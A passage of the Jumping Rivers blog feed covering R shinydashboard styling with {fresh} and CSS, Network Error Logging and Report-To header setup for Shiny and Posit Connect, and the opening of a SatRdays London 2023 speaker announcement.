the pattern &lt;code&gt;adminlte_*&lt;/code&gt;. We will use the &lt;code&gt;adminlte_color()&lt;/code&gt; to
customise our default colours.&lt;/p&gt;
&lt;p&gt;At the top of our app, we need create a new theme &lt;code&gt;my_theme&lt;/code&gt; using the
&lt;code&gt;create_theme()&lt;/code&gt; function. In our theme, we are going to change the
default adminLTE colour called “light-blue” to use our company colour
instead:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_theme &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;adminlte_color&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; light_blue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then need to tell {shinydashboard} to use this theme, by placing a
call to &lt;code&gt;use_theme()&lt;/code&gt; in the dashboard body.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_theme&lt;/span&gt;(my_theme),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, if we change our value boxes to have &lt;code&gt;color = 'light-blue'&lt;/code&gt;, and
remove any &lt;code&gt;skin&lt;/code&gt; argument in &lt;code&gt;dashboardPage&lt;/code&gt;, we end up with this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Using the {fresh} package to style {shinydashboard}. The same\nscreenshot of prices but now with a teal background on information boxes\nand title." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/fresh.png" width="1832"&gt;&lt;/p&gt;
&lt;p&gt;Being able to use any custom colours is definitely a step up from
relying on the built-in colour choices of {shinydashboard}. However,
let’s take it even one step further and fully customise the look of our
{shinydashboard} using CSS.&lt;/p&gt;
&lt;h3 id="using-css"&gt;Using CSS&lt;/h3&gt;
&lt;p&gt;CSS (Cascading Style Sheets) is the language used to style HTML elements
on any webpage. Normally when you build Shiny apps you don’t have to
worry about CSS, which is one of the reasons &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;why Shiny is so easy to
get started
with&lt;/a&gt;.
But at some point you’re going to want more control of how your Shiny
app looks, and then it’s probably time to learn some CSS.&lt;/p&gt;
&lt;p&gt;The main way of including CSS in your Shiny app is by creating a CSS
file (a file with the &lt;code&gt;.css&lt;/code&gt; extension) and placing it in a folder
called &lt;code&gt;www/&lt;/code&gt; in the same folder where your Shiny app lives. We will
call this file &lt;code&gt;styles.css&lt;/code&gt; by convention.&lt;/p&gt;
&lt;p&gt;We are going to use this CSS file to modify two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The font of the app: We want to use a custom font &lt;code&gt;Prompt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The colour of the input slider bar: We want it to match the colour
of the rest of the app&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once we have identified the elements and the associated properties we
want to modify, our CSS file ends up looking like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#7ee787"&gt;url&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;https://fonts.googleapis.com/css2?family=Prompt&amp;amp;display=swap&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;irs--shiny&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;irs-bar&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;irs--shiny&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;irs-single&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;border&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#4898a8&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#4898a8&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#7ee787"&gt;h2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;main-header&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;logo&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-family&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Prompt&amp;#39;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;sans-serif&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line imports our custom font called &lt;code&gt;Prompt&lt;/code&gt; from &lt;a href="https://fonts.google.com/" rel="external"&gt;Google
Fonts&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The next four lines select the elements of the slider we want to change,
and set the border colour as well as background colour to be our company
colour (&lt;code&gt;#4898a8&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;The last four lines select the body text, our H2 heading, as well as the
header text in the top left corner and set the font to be our custom
font.&lt;/p&gt;
&lt;p&gt;Finally, for a {shinydashboard}, you will need to reference the CSS file
in the dashboard body (similar to where we called &lt;code&gt;use_theme()&lt;/code&gt; in the
{fresh} example). With a stylesheet called “styles.css”, it would look
like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;includeCSS&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;www/styles.css&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now our input slider has gone from this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="An unstyled slider input. A slider for number of bedrooms going from\n0-8 which fills in blue and with a blue label showing the\nnumber." height="auto" id="h-rh-i-5" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/slider_no_style.png" width="876"&gt;&lt;/p&gt;
&lt;p&gt;To this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Slider input styled with brand colour. A slider for number of bedrooms\ngoing from 0-8 which fills in teal and with a teal label showing the\nnumber." height="auto" id="h-rh-i-6" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/slider_style.png" width="889"&gt;&lt;/p&gt;
&lt;p&gt;And our font from this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="{shinydashboard} with default font. Bay area rent prices and summary\nbox with default font styling." height="auto" id="h-rh-i-7" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/font_before.png" width="1377"&gt;&lt;/p&gt;
&lt;p&gt;To this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="{shinydashboard} with custom Prompt font. Bay Area rent prices with\nstyling as described with the CSS edits." height="auto" id="h-rh-i-8" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/font_after.png" width="1369"&gt;&lt;/p&gt;
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;There are many ways to customise a {shinydashboard} Shiny app. If you
are content with a few different colours, you can stick to the default
colour palettes, but if you want to use custom colours you should
consider using the {fresh} package. If you want full control of the look
and feel of your dashboard, you might want to consider learning CSS and
creating your own stylesheet! Although, if you wanted to create a very
custom-looking dashboard, you might be better off not using
{shinydashboard} at all…&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Network Error Logging - Important Insights</title><link>https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/</link><pubDate>Thu, 09 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the second in the series of blog posts about using server headers&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/"&gt;Content Security Policies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;Network Error Logging&lt;/a&gt; - this one!&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;Heads up! We&amp;rsquo;re about to launch WASP, a Web Application Security Platform. The aim of WASP is to help you manage (well, you guessed it) the security of you application using Content Security Policy and Network Error Logging. We&amp;rsquo;ll be chatting about it more in a full blog post nearer the time.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="what-is-network-error-logging"&gt;What is Network Error Logging?&lt;/h2&gt;
&lt;p&gt;As this is written, Network Error Logging (NEL) is still an experimental header from W3C. It&amp;rsquo;s a feature of most browsers that lets a website / application opt in to send reports about failed network fetches from the browser. Its aim is to let us, the developers, know when a user has failed to reach the application. For instance, NEL would have let W3C know that when I visited their &lt;a href="https://www.w3.org/TR/network-error-logging/" rel="external"&gt;Network Error Logging page&lt;/a&gt;, I had a 503&amp;hellip;&lt;/p&gt;
&lt;img src="w3c-network-error-logging.png" alt="Image of w3.org website not loading due to a 503 status code error." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h2 id="why-do-you-need-network-error-logging"&gt;Why do you need Network Error Logging?&lt;/h2&gt;
&lt;p&gt;Not being able to load your application (shiny, Rmarkdown or quarto for example) due to a network failure is possibly the worst experience a user can have on your website (apart from XSS attacks or similar). To understand these errors, we need support from the browser. Why? Well, this information will never reach the server, rendering the server metrics useless.&lt;/p&gt;
&lt;p&gt;Since we are setting Network Error Logging at the &lt;strong&gt;server&lt;/strong&gt; layer, we can gain additional insights
into our our application is functioning in real life. This level of detail is particularly important
now that we are able to quickly create Shiny dashboards, Rmarkdown &amp;amp; Quarto documents.
Once you throw in Posit Connect, you can quickly generate a large amount of web content in a short
space of time.&lt;/p&gt;
&lt;h2 id="activating-the-report-to-header"&gt;Activating the Report-To header&lt;/h2&gt;
&lt;p&gt;There are two steps to activating NEL for your site. First, it requires the &lt;code&gt;Report-To&lt;/code&gt; header. We chatted a little bit about it&amp;rsquo;s predecessor, &lt;code&gt;report-uri&lt;/code&gt;, in the &lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/" rel="external"&gt;Content Security Policy blog&lt;/a&gt;. The &lt;code&gt;Report-To&lt;/code&gt; header allows us to specify groups of endpoints to use within the Content Security Policy and Network Error Logging headers. This means we can send our CSP and NEL reports to different endpoints for separate processing. An example &lt;code&gt;Report-To&lt;/code&gt; would look like so&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Report&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;To&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;group&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csp-endpoint&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;max_age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17280000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;endpoints&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;url&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/csp-reports&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;group&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;nel-endpoint&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;max_age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17280000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;endpoints&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;url&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/nel-reports&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this set-up, we&amp;rsquo;ve configured the browser to send reports to the endpoints for &lt;code&gt;17280000&lt;/code&gt; seconds (200 days). After this, you&amp;rsquo;ll have to re-issue the &lt;code&gt;Report-To&lt;/code&gt; header to begin receiving reports again.&lt;/p&gt;
&lt;h2 id="activating-the-nel-header"&gt;Activating the NEL header&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;NEL&lt;/code&gt; header is pretty simple. There are only two fields:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;report-to&lt;/code&gt;: The endpoint group name to send the NEL reports&lt;/li&gt;
&lt;li&gt;&lt;code&gt;max_age&lt;/code&gt;: How long the browser should use the endpoint for in seconds.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If we want to send NEL reports to the &lt;code&gt;nel-endpoint&lt;/code&gt; group, then my &lt;code&gt;NEL&lt;/code&gt; header looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;NEL&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;report_to&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;nel-endpoint&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;max_age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17280000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="the-report-format"&gt;The report format&lt;/h2&gt;
&lt;p&gt;Let&amp;rsquo;s say we&amp;rsquo;ve set NEL up on our website. A user trying to access a page on the website has received a 400 error code. The browser will send a POST request of &lt;code&gt;Content-Type: application/reports+json&lt;/code&gt; with a format similar to&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;age&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;network-error&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;url&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/example&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;body&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;elapsed_time&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;354&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;method&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;phase&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;protocol&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;http/1.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;referrer&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.com/example&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sampling_fraction&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;server_ip&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;115.554.22.87&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;status_code&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;http.error&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The top-level &amp;ldquo;&lt;code&gt;body&lt;/code&gt;&amp;rdquo; key contains the actual network error report whilst the other top-level keys are meta info about the report. The meta info includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;age&lt;/code&gt; - How long after the error was encountered did the browser send the report? In ms.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;type&lt;/code&gt; - Type of report. Always &amp;ldquo;network-error&amp;rdquo; for NEL reports.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;url&lt;/code&gt; - The URL where the error occurred.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Within the body itself, there are a few important keys we should know about:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;referrer&lt;/code&gt; - This is the URL from which the user has come. If this and the top-level &lt;code&gt;url&lt;/code&gt; are the same, the error happened whilst the user was on the same page.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;status_code&lt;/code&gt; - The status code that the browser received from the server. In this case, it&amp;rsquo;s a 400.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;elapsed_time&lt;/code&gt; - How long it took the browser to abort the process after it started, in ms. For us, this is 354ms.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;type&lt;/code&gt; - The type of network error. See a full list of the error types &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Network_Error_Logging" rel="external"&gt;here&lt;/a&gt;. We&amp;rsquo;ve got &lt;code&gt;http.error&lt;/code&gt;, which means the browser successfully received a response, but it was a 400 or 500 status code.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;server_ip&lt;/code&gt; - The server IP the browser is trying to resolve to.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note, the report does not get sent as soon as the user gets the network error. The browser will batch reports and send periodically. As well as this, no information is kept about the end-user, just the network error.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Need help setting up Network Logging? Please get in &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/network-error-logging-shiny-posit-connect/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023: Speakers</title><link>https://www.jumpingrivers.com/blog/satrdays-london-speakers/</link><pubDate>Tue, 07 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-speakers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-speakers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-speakers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays London is fast approaching, and we are happy to announce our full lineup of speakers for the event! Read on for more info. If you want to join the fun, head over to the &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; to sign up!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-london-speakers"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="keynote-speakers"&gt;Keynote Speakers&lt;/h3&gt;
